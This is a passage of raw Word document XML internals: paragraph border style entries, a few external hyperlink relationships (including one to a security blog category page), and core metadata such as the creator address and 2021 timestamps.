        <w:div w:id="22560228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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1989816764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7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77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6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4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4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4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86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98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4152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9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74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6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01364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80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67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388674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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="114056611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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1765758824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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1511524126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8" w:color="9ECEF1"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="380906648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8" w:color="9ECEF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712376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est.com/test.aspx" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://evi1cg.me/categories/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A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9EE25-0ECA-4ED3-9963-8E04785C2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panda.tung@cathaysec.com.tw</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>panda.tung@cathaysec.com.tw</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-02T06:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-02T06:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>